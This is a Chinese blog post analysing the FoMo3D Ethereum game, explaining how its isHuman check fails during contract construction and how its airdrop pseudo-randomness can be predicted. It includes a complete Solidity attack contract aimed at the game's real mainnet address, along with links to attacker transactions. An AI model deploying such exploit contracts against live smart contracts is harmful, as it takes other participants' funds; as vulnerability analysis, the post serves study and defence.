【FOMO3d】 的隐藏"彩(lou)蛋(dong)"

2018-08-21  本文已影响0人  王铁塔

七月初推出的一款资金盘游戏fomo3d,终于在十几天后成功引爆了中国的链圈和币圈。

游戏规则介绍

在每一局游戏的开始,玩家都可以用以太币ETH来购买游戏道具key,相当于往资金盘里的投资。游戏的倒计时为24小时,每当有新人买入key时,游戏就会自动延长30s,但网页上的倒计时仍为24小时。

fomo3d主页

截止发文,Time Purchased已经增长到了30+年,大家可以自行计算有多少人买入了key。

最终这个资金盘的资金将会有7个流向:

最后一个买key的人将会拿走资金盘中的48%的以太币,作为奖励。看看首页的数字,就可以想见游戏的疯狂程度。

安全隐患

截至发稿,没有重大安全漏洞披露,即管理者后门或者攻击者直接可以转移合约内ETH的漏洞,可暂时视为安全。不过还是有一个小漏洞值得大家关注,即modifier对普通账户(外部账户)和合约账户的判断。其初衷是好的,保证散户玩家的公平性,但是由于判断逻辑的偏差直接导致了该方法失效。

下图是从etherscan网站上合约地址中的代码截图:

fomo3d-isHuman

此修改器用于限制调用方法者只能是普通账户(无法执行复杂的代码,也无法重入)。其中,通过判断地址内的extcodesize是否为0来判断该地址是否为普通账户。但是当合约正在执行构造函数并部署时,其extcodesize也为0,也就是说合约完全可以通过在constructor中调用方法而绕过该判断。

攻击的方向有了,下面就剩下从哪里下手了。

这时我们注意到空投逻辑:

/**
* @dev generates a random number between 0-99 and checks to see if thats
* resulted in an airdrop win
* @return do we have a winner?
*/
function airdrop()
private
view
returns(bool)
{
  uint256 seed = uint256(keccak256(abi.encodePacked(
  (block.timestamp).add
  (block.difficulty).add
  ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)).add
  (block.gaslimit).add
  ((uint256(keccak256(abi.encodePacked(msg.sender)))) / (now)).add
  (block.number)
  )));

  if((seed - ((seed / 1000) * 1000)) < airDropTracker_)
    return(true);
  else
    return(false);
}

大家可以看到,与其说是随机数,不如说是基于链状态的伪随机数。此时,我们可以不断地部署合约并在合约的constructor中计算随机数的值,一旦发现有利可图,就可以调用FOMO3d合约中的相应方法。

接下来,我们浏览完整的代码,找到airdrop()在哪里被使用,我们就可以发现:

上面提到的有机会,就是指上面的伪随机数的计算符合要求。

到这里,最后一块拼图也补齐了。我们可以创造一个智能合约,通过计算随机数,就可以100%获得空投。我们给出了一个代码范例如下图(友情提醒:下面的代码未经测试,是仅表示思路的“伪代码”,并不保证功能上的成功):

pragma solidity ^0.4.24;

interface FoMo3DlongInterface {
  function airDropTracker_() external returns (uint256);
  function airDropPot_() external returns (uint256);
  function withdraw() external;
}

contract PwnFoMo3D {
  constructor() public payable {
    // Link up the fomo3d contract and ensure this whole thing is worth it
    FoMo3DlongInterface fomo3d = FoMo3DlongInterface(0xA62142888ABa8370742bE823c1782D17A0389Da1);
    if (fomo3d.airDropPot_() < 0.4 ether) {
      revert();
    }
    // Calculate whether this transaction would produce an airdrop. Take the
    // "random" number generator from the FoMo3D contract.
    uint256 seed = uint256(keccak256(abi.encodePacked(
      (block.timestamp) +
      (block.difficulty) +
      ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)) +
      (block.gaslimit) +
      ((uint256(keccak256(abi.encodePacked(msg.sender)))) / (now)) +
      (block.number)
    )));

    uint256 tracker = fomo3d.airDropTracker_();
    if((seed - ((seed / 1000) * 1000)) >= tracker) {
      revert();
    }
    // Ok, seems we can win the airdrop, pwn the contract
    address(fomo3d).call.value(0.1 ether)();
    fomo3d.withdraw();
    selfdestruct(msg.sender);
  }
}

再次提醒,上面的代码未经测试。因为每次调用airdrop都意味着我们必须损失0.1个以太币,仅当你确保你的空投奖励大于0.1以太币时,上述方法才值得尝试。也就是说只有空投奖池总共需要大于0.4以太币。已经有人尝试空投攻击2天了:

https://etherscan.io/txs?a=0x73b61a56cb93c17a1f5fb21c01cfe0fb23f132c3

https://etherscan.io/tx/0x86c3ff158b7e372e3e2aa964b2c3f0ca25c59f7bcc95a13fd72b139c0ab6f7ad

通过浏览其中一笔成功的交易我们可以看到,攻击者的代码更加复杂:他们尝试通过部署新合约来获得超额的空投奖励,但是当随机数计算不通过时,选择迭代创建合约直到有一个成功的,而不是选择使用revert()

关于该漏洞的团队回应

对此,团队本身的态度很随意, 表示一切尽在预料之内。并解释airdrops只是独立的非常小的奖金池,攻击也无伤大雅。(此条推特貌似已删除)

fomo3d_teamjust

FOMO3d VS ethereum foundation

自从fomo3d大火之后,该团队一直尝试在twitter上呼叫V神,以发现且公开EVM诸多重大漏洞为要挟呼叫V神正面回应:

fomo3d_to_v1

,并插播各种战果炫耀图(参加人数、集资速度和量级、造成以太坊堵塞程度历史罕见等)。从一开始的殷切呼唤,到始终没有得到V神正面回复之后表演失望。

fomo3d_to_eth2

此间,以太坊的team leader - peter倒是有过回应,表示这并不是漏洞,这些现象/行为都是文档里提到过的,不要想着用这种大众敏感词吸引注意力。想蹭V神热度的话,请报点猛料好么。

以太peter
参考链接:

https://www.reddit.com/r/ethereum/comments/916xni/how_to_pwn_fomo3d_a_beginners_guide/

最后,不知道大家对这个“庞氏游戏”有什么自己的看法,可以尽情留言。

上一篇下一篇

猜你喜欢

热点阅读